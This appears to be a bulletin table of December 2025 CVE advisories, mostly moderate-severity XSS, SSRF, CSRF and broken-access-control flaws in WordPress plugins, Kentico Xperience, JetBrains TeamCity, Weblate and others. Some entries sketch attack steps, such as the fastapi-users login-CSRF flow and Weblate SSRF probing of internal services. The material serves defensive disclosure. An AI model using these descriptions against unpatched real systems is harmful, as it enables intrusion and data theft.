| wpforchurch--Sermon Manager | Missing Authorization vulnerability in wpforchurch Sermon Manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sermon Manager: from n/a through 2.30.0. | 2025-12-18 | 5.3 | CVE-2025-63002 | https://vdp.patchstack.com/database/wordpress/plugin/sermon-manager-for-wordpress/vulnerability/wordpress-sermon-manager-plugin-2-30-0-broken-access-control-vulnerability?_s_id=cve |
| PickPlugins--Post Grid and Gutenberg Blocks | Authorization Bypass Through User-Controlled Key vulnerability in PickPlugins Post Grid and Gutenberg Blocks allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post Grid and Gutenberg Blocks: from n/a through 2.3.19. | 2025-12-18 | 5.3 | CVE-2025-63043 | https://vdp.patchstack.com/database/wordpress/plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-19-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WeblateOrg--weblate | Weblate is a web based localization tool. The Create Component functionality in Weblate allows authorized users to add new translation components by specifying both a version control system and a source code repository URL to pull from. However, prior to version 5.15, the repository URL field is not validated or sanitized, allowing an attacker to supply arbitrary protocols, hostnames, and IP addresses, including localhost, internal network addresses, and local filenames. When the Mercurial version control system is selected, Weblate exposes the full server-side HTTP response for the provided URL. This effectively creates a server-side request forgery (SSRF) primitive that can probe internal services and return their contents. In addition to accessing internal HTTP endpoints, the behavior also enables local file enumeration by attempting file:// requests. While file contents may not always be returned, the application's error messages clearly differentiate between files that exist and files that do not, revealing information about the server's filesystem layout. In cloud environments, this behavior is particularly dangerous, as internal-only endpoints such as cloud metadata services may be accessible, potentially leading to credential disclosure and full environment compromise. This has been addressed in the Weblate 5.15 release. As a workaround, remove Mercurial from `VCS_BACKENDS`; the Git backend is not affected. The Git backend was already configured to block the file protocol and does not expose the HTTP response content in the error message. | 2025-12-15 | 5 | CVE-2025-66407 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-hfpv-mc5v-p9mm https://github.com/WeblateOrg/weblate/pull/17102 https://github.com/WeblateOrg/weblate/pull/17103 |
| Foxit Software Inc.--Foxit PDF Reader | A memory corruption vulnerability exists in the 3D annotation handling of Foxit PDF Reader due to insufficient bounds checking when parsing PRC data. When opening a PDF file containing malformed or specially crafted PRC content, out-of-bounds memory access may occur, resulting in memory corruption. | 2025-12-19 | 5.3 | CVE-2025-66496 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A memory corruption vulnerability exists in the 3D annotation handling of Foxit PDF Reader due to insufficient bounds checking when parsing PRC data. When opening a PDF file containing malformed or specially crafted PRC content, out-of-bounds memory access may occur, resulting in memory corruption. | 2025-12-19 | 5.3 | CVE-2025-66497 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A memory corruption vulnerability exists in the 3D annotation handling of Foxit PDF Reader due to insufficient bounds checking when parsing U3D data. When opening a PDF file containing malformed or specially crafted PRC content, out-of-bounds memory access may occur, resulting in memory corruption. | 2025-12-19 | 5.3 | CVE-2025-66498 | https://www.foxit.com/support/security-bulletins.html |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15, it was possible to trigger repository updates for many repositories via a crafted webhook payload. Version 5.15 fixes the issue. As a workaround, disabling webhooks completely using ENABLE_HOOKS avoids this vulnerability. | 2025-12-16 | 5.3 | CVE-2025-67492 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-pj86-258h-qrvf https://github.com/WeblateOrg/weblate/pull/17221 |
| Mintlify--Mintlify Platform | The GitHub Integration API in Mintlify Platform before 2025-11-15 allows remote attackers to obtain sensitive repository metadata via the repository owner and name fields. It fails to validate that the repository owner and name fields provided during configuration belong to the specific GitHub App Installation ID associated with the user's organization. | 2025-12-19 | 5 | CVE-2025-67844 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 |
| MISP--MISP | In MISP before 2.5.28, app/View/Elements/Workflows/executionPath.ctp allows XSS in the workflow execution path. | 2025-12-15 | 5.4 | CVE-2025-67906 | https://github.com/MISP/MISP/commit/1f39deb572da7ecb5855e30ff3cc8cbcaa0c1054 https://vulnerability.circl.lu/vuln/gcve-1-2025-0031 https://github.com/franckferman/GCVE-1-2025-0030 https://github.com/MISP/MISP/compare/v2.5.27...v2.5.28 https://github.com/franckferman/CVE-2025-67906 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 reflected XSS was possible on VCS Root setup. | 2025-12-16 | 5.4 | CVE-2025-68165 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 a DOM-based XSS was possible on the OAuth connections tab. | 2025-12-16 | 5.4 | CVE-2025-68166 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.1 reflected XSS was possible on the storage settings page. | 2025-12-16 | 5.4 | CVE-2025-68268 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2025.3 missing confirmation allowed opening of untrusted remote projects over SSH. | 2025-12-16 | 5.4 | CVE-2025-68269 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| Elastic--Packetbeat | Allocation of resources without limits or throttling (CWE-770) allows an unauthenticated remote attacker to cause excessive allocation (CAPEC-130) of memory and CPU via the integration of malicious IPv4 fragments, leading to a degradation in Packetbeat. | 2025-12-18 | 5.3 | CVE-2025-68388 | https://discuss.elastic.co/t/packetbeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-29/384177 |
| fastapi-users--fastapi-users | FastAPI Users allows users to quickly add a registration and authentication system to their FastAPI project. Prior to version 15.0.2, the OAuth login state tokens are completely stateless and carry no per-request entropy or any data that could link them to the session that initiated the OAuth flow. `generate_state_token()` is always called with an empty `state_data` dict, so the resulting JWT only contains the fixed audience claim plus an expiration timestamp. On callback, the library merely checks that the JWT verifies under `state_secret` and is unexpired; there is no attempt to match the state value to the browser that initiated the OAuth request, no correlation cookie, and no server-side cache. Any attacker can hit `/authorize`, capture the server-generated state, finish the upstream OAuth flow with their own provider account, and then trick a victim into loading `.../callback?code=<attacker_code>&state=<attacker_state>`. Because the state JWT is valid for any client for ~1 hour, the victim's browser will complete the flow. This leads to login CSRF. Depending on the app's logic, the login CSRF can lead to an account takeover of the victim account or to the victim user getting logged in to the attacker's account. Version 15.0.2 contains a patch for the issue. | 2025-12-19 | 5.9 | CVE-2025-68481 | https://github.com/fastapi-users/fastapi-users/security/advisories/GHSA-5j53-63w8-8625 https://github.com/fastapi-users/fastapi-users/commit/7cf413cd766b9cb0ab323ce424ddab2c0d235932 https://github.com/fastapi-users/fastapi-users/blob/bcee8c9b884de31decb5d799aead3974a0b5b158/fastapi_users/router/oauth.py#L111 https://github.com/fastapi-users/fastapi-users/blob/bcee8c9b884de31decb5d799aead3974a0b5b158/fastapi_users/router/oauth.py#L57 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration and Analytics Community Dashboard Framework prior to versions 10.2.0.4, including 9.3.0.x and 8.3.x display the full server stack trace when encountering an error within the GetCdfResource servlet. | 2025-12-15 | 5.3 | CVE-2025-9122 | https://support.pentaho.com/hc/en-us/articles/41833799577741--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Generation-of-Error-Message-Containing-Sensitive-Information-Versions-before-10-2-0-4-Impacted-CVE-2025-9122 |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows authenticated users to view sensitive system objects through the live site widget properties dialog. Attackers can exploit this vulnerability to access unauthorized system information without proper access controls. | 2025-12-18 | 4.3 | CVE-2019-25230 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.0 User Widget Information Disclosure |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via error messages containing specially crafted object names. This allows malicious scripts to execute in users' browsers when administrators view error messages in the administration interface. | 2025-12-18 | 4.6 | CVE-2020-36889 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.90 Administration Interface Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to upload files with spoofed Content-Type that do not match file extensions. Attackers can exploit this vulnerability by uploading malicious files with manipulated MIME types, allowing malicious scripts to execute in users' browsers. | 2025-12-18 | 4.6 | CVE-2020-36891 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.49 File Upload Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows administration users to inject malicious scripts via email marketing templates. Attackers can exploit this vulnerability to execute malicious scripts that could compromise user browsers and steal sensitive information. | 2025-12-18 | 4.6 | CVE-2022-50680 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.92 Email Marketing Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form redirect URL configuration. This allows malicious scripts to execute in users' browsers through unvalidated form configuration settings. | 2025-12-18 | 4.6 | CVE-2022-50683 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.74 Form Configuration Stored XSS |
| Kentico--Xperience | An HTML injection vulnerability in Kentico Xperience allows attackers to inject malicious HTML values into form submission emails via unencoded form fields. Unencoded form values could enable HTML content execution in recipient email clients, potentially compromising email security. | 2025-12-18 | 4.6 | CVE-2022-50684 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.71 Form Emails HTML Injection |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via XML file uploads as page attachments or metafiles. Attackers can upload malicious XML files that enable stored XSS, allowing malicious scripts to execute in users' browsers. | 2025-12-18 | 4.6 | CVE-2022-50685 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.56 File Upload Stored XSS |
| Mapro Collins--Magazine Edge | Missing Authorization vulnerability in Mapro Collins Magazine Edge allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Magazine Edge: from n/a through 1.13. | 2025-12-20 | 4.3 | CVE-2023-25068 | https://vdp.patchstack.com/database/wordpress/theme/magazine-edge/vulnerability/wordpress-magazine-edge-theme-1-13-authenticated-arbitrary-plugin-activation?_s_id=cve |
| mojofywp--WP Affiliate Disclosure | Vulnerability in mojofywp WP Affiliate Disclosure wp-affiliate-disclosure. This issue affects WP Affiliate Disclosure: from n/a through 1.2.6. | 2025-12-21 | 4.3 | CVE-2023-47232 | https://vdp.patchstack.com/database/wordpress/plugin/wp-affiliate-disclosure/vulnerability/wordpress-wp-affiliate-disclosure-plugin-1-2-6-broken-access-control-csrf-vulnerability?_s_id=cve |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts in the administration interface. Attackers can exploit this vulnerability to execute arbitrary scripts within the administrative context. | 2025-12-18 | 4.6 | CVE-2023-53736 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.120 Administration Interface Reflected XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows global administrators to inject malicious payloads via the Localization application. Attackers can execute scripts that could affect multiple parts of the administration interface. | 2025-12-18 | 4.6 | CVE-2023-53737 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.101 Localization Application Stored XSS |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via page preview URLs. Attackers can exploit this vulnerability to execute arbitrary scripts in users' browsers during page preview interactions. | 2025-12-18 | 4.6 | CVE-2023-53738 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.109 Page Preview Reflected XSS |
| Rukovoditel--Rukovoditel | Rukovoditel 3.4.1 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert XSS payloads in project task comments to execute arbitrary JavaScript in victim browsers. | 2025-12-16 | 4.6 | CVE-2023-53897 | ExploitDB-51548 Rukovoditel Product Webpage VulnCheck Advisory: Rukovoditel 3.4.1 Multiple Stored Cross-Site Scripting via Comments |
| Rukovoditel--Rukovoditel | Rukovoditel 3.4.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts. Attackers can insert iframe and script payloads in application copyright text to execute arbitrary JavaScript in victim browsers. | 2025-12-16 | 4.6 | CVE-2023-53898 | ExploitDB-51548 Rukovoditel Product Webpage VulnCheck Advisory: Rukovoditel 3.4.1 Multiple Stored Cross-Site Scripting via Configuration |
| Xenforo--Xenforo | Xenforo 2.2.13 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the smilie category title parameter. Attackers can create a smilie category with a malicious script that will execute when the admin panel is loaded, potentially enabling further client-side attacks. | 2025-12-17 | 4.6 | CVE-2023-53904 | ExploitDB-51547 Official Product Webpage VulnCheck Advisory: Xenforo 2.2.13 Authenticated Stored Cross-Site Scripting via Smilie Categories |
| projectSend--projectSend | projectSend r1605 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious JavaScript through the custom assets configuration page. Attackers can craft a JavaScript payload in the custom assets section that will execute when other users load the affected page, enabling persistent script injection. | 2025-12-17 | 4.6 | CVE-2023-53906 | ExploitDB-51518 Official Product Webpage VulnCheck Advisory: ProjectSend r1605 Stored Cross-Site Scripting via Custom Assets Page |
| Tmrswrr--Textpattern CMS | Textpattern CMS 4.8.8 contains a stored cross-site scripting vulnerability in the article excerpt field that allows authenticated users to inject malicious scripts. Attackers can insert JavaScript payloads into the excerpt, which will execute when the article is viewed by other users. | 2025-12-17 | 4.6 | CVE-2023-53911 | ExploitDB-51523 Official Product Webpage VulnCheck Advisory: Textpattern CMS 4.8.8 Authenticated Stored Cross-Site Scripting via Article Excerpt |
| Podcastgenerator--PodcastGenerator | PodcastGenerator 3.2.9 contains a stored cross-site scripting vulnerability in the Freebox content field accessible through the theme customization interface (theme_freebox.php). Malicious JavaScript payloads injected into the Freebox content execute when users visit the application's home page. | 2025-12-17 | 4.6 | CVE-2023-53919 | ExploitDB-51454 Official Product Webpage VulnCheck Advisory: PodcastGenerator Stored Cross-Site Scripting via Freebox Content Field |
| Podcastgenerator--PodcastGenerator | PodcastGenerator 3.2.9 contains a stored cross-site scripting vulnerability in the podcast title field accessible through the podcast details interface (podcast_details.php). Malicious JavaScript payloads injected into the podcast title execute when users visit the application's home page. | 2025-12-17 | 4.6 | CVE-2023-53920 | ExploitDB-51454 Official Product Webpage VulnCheck Advisory: PodcastGenerator Stored Cross-Site Scripting via Podcast Title Field |
| s9y--Serendipity | Serendipity 2.4.0 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts through blog entry creation. Attackers can craft entries with JavaScript payloads that will execute when other users view the compromised blog post. | 2025-12-17 | 4.6 | CVE-2023-53932 | ExploitDB-51373 Official Product Homepage VulnCheck Advisory: Serendipity 2.4.0 Stored Cross-Site Scripting via Admin Entry Creation |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form validation rule configuration. Attackers can exploit this vulnerability to execute malicious scripts that will run in users' browsers. | 2025-12-18 | 4.6 | CVE-2024-58321 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.159 Form Validation Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious code into shipping options configuration. This could lead to potential theft of sensitive data by executing malicious scripts in users' browsers. | 2025-12-18 | 4.6 | CVE-2024-58322 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.158 Shipping Options Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Checkbox form component. This allows malicious scripts to execute in users' browsers by exploiting HTML support in the form builder. | 2025-12-18 | 4.6 | CVE-2024-58323 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.158 Checkbox Form Component Stored XSS |
| wpdevteam--Gutenberg Essential Blocks Page Builder for Gutenberg Blocks & Patterns | The Gutenberg Essential Blocks - Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to unauthorized access of data due to missing or incorrect capability checks on the get_instagram_access_token_callback, google_map_api_key_save_callback and get_siteinfo functions in all versions up to, and including, 5.7.2. This makes it possible for authenticated attackers, with Author-level access and above, to view API keys configured for the external services. | 2025-12-17 | 4.3 | CVE-2025-11369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e5b1e90-53f7-4afc-9544-c36afe1ee813?source=cve https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Integrations/OpenVerse.php#L108 https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Integrations/Instagram.php#L20 https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Integrations/GoogleMap.php#L50 |
| saadiqbal--myCred Points Management System For Gamification, Ranks, Badges, and Loyalty Program. | The myCred - Points Management System For Gamification, Ranks, Badges, and Loyalty Program plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.9.7.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive information including user IDs, display names, and email addresses of all users on the site via the get_bank_accounts AJAX action. Passwords are not exposed. | 2025-12-19 | 4.3 | CVE-2025-12361 | https://www.wordfence.com/threat-intel/vulnerabilities/id/43b05697-bc36-4f32-86b4-2feef892fe42?source=cve https://plugins.trac.wordpress.org/browser/mycred/tags/2.9.5.1/addons/banking/services/mycred-service-central.php#L172 https://plugins.trac.wordpress.org/changeset/3421768/mycred/trunk?contextall=1&old=3417299&old_path=%2Fmycred%2Ftrunk |
| dylanjkotze--Zephyr Project Manager | The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.203 via the `file` parameter. This makes it possible for authenticated attackers, with Custom-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. On servers that have `allow_url_fopen` enabled, this issue also allows Server-Side Request Forgery. | 2025-12-17 | 4.9 | CVE-2025-12496 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b4b0640-d61a-4969-a5c0-d2d709fb56d0?source=cve https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Base/AjaxHandler.php#L3506 https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Core/Projects.php#L1870 |
| ninjateam--FileBird WordPress Media Library Folders & File Manager | The FileBird - WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 6.5.1 via the "ConvertController::insertToNewTable" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author level access and above, to inject global folders and reassign arbitrary media attachments to those folders under certain circumstances. | 2025-12-15 | 4.3 | CVE-2025-12900 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59592b27-d431-499a-b3c3-3d43a5513c36?source=cve https://plugins.trac.wordpress.org/changeset/3411587 |
| realmag777--HUSKY Products Filter Professional for WooCommerce | The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.7.3 via the "woof_add_subscr" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber level access and above, to create product messenger subscriptions on behalf of arbitrary users, including administrators. | 2025-12-18 | 4.3 | CVE-2025-13110 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ea2dfc5-0dcc-4ea1-9ade-d59021e078fa?source=cve https://plugins.trac.wordpress.org/changeset/3412492/woocommerce-products-filter https://plugins.trac.wordpress.org/changeset/3415428/woocommerce-products-filter |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.5, 11.0.x <= 11.0.4, 10.12.x <= 10.12.2 fail to invalidate invite tokens after use, which allows malicious actors who have intercepted invite tokens to manipulate channel memberships, including adding or removing users from private channels, via a token replay attack. | 2025-12-17 | 4.3 | CVE-2025-13324 | https://mattermost.com/security-updates |
| dipesh_patel--Web to SugarCRM Lead | The Web to SugarCRM Lead plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the custom field deletion functionality. This makes it possible for unauthenticated attackers to delete custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-21 | 4.3 | CVE-2025-13361 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b7c54b5d-ad73-44f1-afdb-01136ec0b9ae?source=cve https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/trunk/wpscl-admin-functions.php#L496 https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/tags/1.0.0/wpscl-admin-functions.php#L496 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3423497%40web-to-sugarcrm-lead&new=3423497%40web-to-sugarcrm-lead |
| codename065--Download Manager | The Download Manager plugin for WordPress is vulnerable to unauthorized access of sensitive information in all versions up to, and including, 3.3.32. This is due to missing authorization and capability checks on the `wpdm_media_access` AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve passwords and access control settings for protected media attachments, which can then be used to bypass the intended media protection and download restricted files. | 2025-12-18 | 4.3 | CVE-2025-13498 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f2cdd50d-6290-4cef-a72c-2e9d680d4f1f?source=cve https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.32/src/MediaLibrary/MediaAccessControl.php#L26 https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.32/src/MediaLibrary/MediaAccessControl.php#L275 https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.32/src/MediaLibrary/MediaAccessControl.php#L299 https://plugins.trac.wordpress.org/changeset/3413804/ |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getAuthors function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to retrieve emails for all users with edit_posts capability. | 2025-12-16 | 4.3 | CVE-2025-13741 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f67da8c-da60-4c77-a8b8-7dfc027662e9?source=cve https://plugins.trac.wordpress.org/browser/post-expirator/tags/4.9.1/src/Modules/Workflows/Rest/RestApiV1.php#L376 |
| mateuszgbiorczyk--Converter for Media Optimize images \| Convert WebP & AVIF | The Converter for Media - Optimize images \| Convert WebP & AVIF plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `/webp-converter/v1/regenerate-attachment` REST endpoint in all versions up to, and including, 6.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete optimized WebP/AVIF variants for arbitrary attachments. | 2025-12-17 | 4.3 | CVE-2025-13750 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9a31190f-e2ed-46ee-a224-85a0a003738d?source=cve https://plugins.trac.wordpress.org/changeset/3414745/webp-converter-for-media |
| themeisle--Auto Featured Image (Auto Post Thumbnail) | The Auto Featured Image (Auto Post Thumbnail) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulk_action_generate_handler function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete or generate featured images on posts they do not own. | 2025-12-16 | 4.3 | CVE-2025-13794 | https://www.wordfence.com/threat-intel/vulnerabilities/id/29b0fd97-a669-42bb-b01e-bdc0395d697e?source=cve https://plugins.trac.wordpress.org/browser/auto-post-thumbnail/tags/4.2.1/includes/class-plugin.php#L425 |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Image Gallery - Photo Grid & Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `add_images_to_gallery_callback()` function in all versions up to, and including, 2.13.3. This makes it possible for authenticated attackers, with Author-level access and above, to add images to arbitrary Modula galleries owned by other users. | 2025-12-15 | 4.3 | CVE-2025-14003 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4490afba-1487-40a4-99c6-c753acb10df3?source=cve https://plugins.trac.wordpress.org/changeset/3414176/modula-best-grid-gallery |
| LINE Corporation--LINE client for iOS | The in-app browser in LINE client for iOS versions prior to 14.14 is vulnerable to address bar spoofing, which could allow attackers to execute malicious JavaScript within iframes while displaying trusted URLs, enabling phishing attacks through overlaid malicious content. | 2025-12-15 | 4.3 | CVE-2025-14021 | https://hackerone.com/reports/2548498 |
| hasthemes--WC Builder WooCommerce Page Builder for WPBakery | The WC Builder - WooCommerce Page Builder for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'heading_color' parameter (and multiple other styling parameters) of the `wpbforwpbakery_product_additional_information` shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 4.4 | CVE-2025-14054 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4e4fe4b6-cc1e-40be-bd2e-bf2745244892?source=cve https://plugins.trac.wordpress.org/browser/wc-builder/trunk/includes/addons/product_additional_information.php#L33 https://plugins.trac.wordpress.org/browser/wc-builder/tags/1.2.0/includes/addons/product_additional_information.php#L33 https://plugins.trac.wordpress.org/changeset/3419217/ |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member plugin for WordPress is vulnerable to Profile Privacy Setting Bypass in all versions up to, and including, 2.11.0. This is due to a flaw in the secure fields mechanism where field keys are stored in the allowed fields list before the `required_perm` check is applied during rendering. This makes it possible for authenticated attackers with Subscriber-level access to modify their profile privacy settings (e.g., setting profile to "Only me") via direct parameter manipulation, even when the administrator has explicitly disabled the option for their role. | 2025-12-17 | 4.3 | CVE-2025-14081 | https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/um-actions-account.php#L322 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-account.php#L610 https://plugins.trac.wordpress.org/changeset/3421362/ |
| edckwt--Quran Gateway | The Quran Gateway plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing nonce validation in the quran_gateway_options function. This makes it possible for unauthenticated attackers to modify the plugin's display settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-20 | 4.3 | CVE-2025-14164 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e16da38-709a-4b9a-9f00-efe8459a1318?source=cve https://plugins.trac.wordpress.org/browser/quran-gateway/trunk/admin.php#L457 https://plugins.trac.wordpress.org/browser/quran-gateway/tags/1.5/admin.php#L457 |
| wpmaniax--WP DB Booster | The WP DB Booster plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing nonce validation on the cleanup_all AJAX action. This makes it possible for unauthenticated attackers to delete database records including post drafts, revisions, comments, and metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-20 | 4.3 | CVE-2025-14168 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc0af0a4-81b5-425e-aba3-0c422aa33634?source=cve https://plugins.trac.wordpress.org/browser/wp-db-booster/trunk/admin/class-wp-db-booster-admin.php#L336 https://plugins.trac.wordpress.org/browser/wp-db-booster/tags/1.0.1/admin/class-wp-db-booster-admin.php#L336 |
| bdthemes--Prime Slider Addons for Elementor | The Prime Slider - Addons for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.9 via the import_elementor_template AJAX action. This makes it possible for authenticated attackers, with subscriber level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-18 | 4.3 | CVE-2025-14277 | https://www.wordfence.com/threat-intel/vulnerabilities/id/069a56a1-ca17-43cc-a51f-51b6111f5b61?source=cve https://plugins.trac.wordpress.org/changeset/3419222/bdthemes-prime-slider-lite |
| wpcodefactory--Download Plugins and Themes in ZIP from Dashboard | The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.6. This is due to missing or incorrect nonce validation on the download_plugin_bulk and download_theme_bulk functions. This makes it possible for unauthenticated attackers to archive all of the site's plugins and themes and place them in the `wp-content/uploads/` directory via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-17 | 4.3 | CVE-2025-14399 | https://www.wordfence.com/threat-intel/vulnerabilities/id/845b6bcf-004b-4b92-88d7-3d331fa58c11?source=cve https://plugins.trac.wordpress.org/changeset/3417484/download-plugins-dashboard |
| listingthemes--Sweet Energy Efficiency | The Sweet Energy Efficiency plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on the 'sweet_energy_efficiency_action' AJAX handler in all versions up to, and including, 1.0.6. This makes it possible for authenticated attackers, with subscriber level access and above, to read, modify, and delete arbitrary graphs. | 2025-12-18 | 4.3 | CVE-2025-14618 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ccc8b30-1bdf-4335-85a9-79c6f9a88afc?source=cve https://plugins.trac.wordpress.org/changeset/3417589/sweet-energy-efficiency https://plugins.trac.wordpress.org/changeset/3420909/sweet-energy-efficiency |
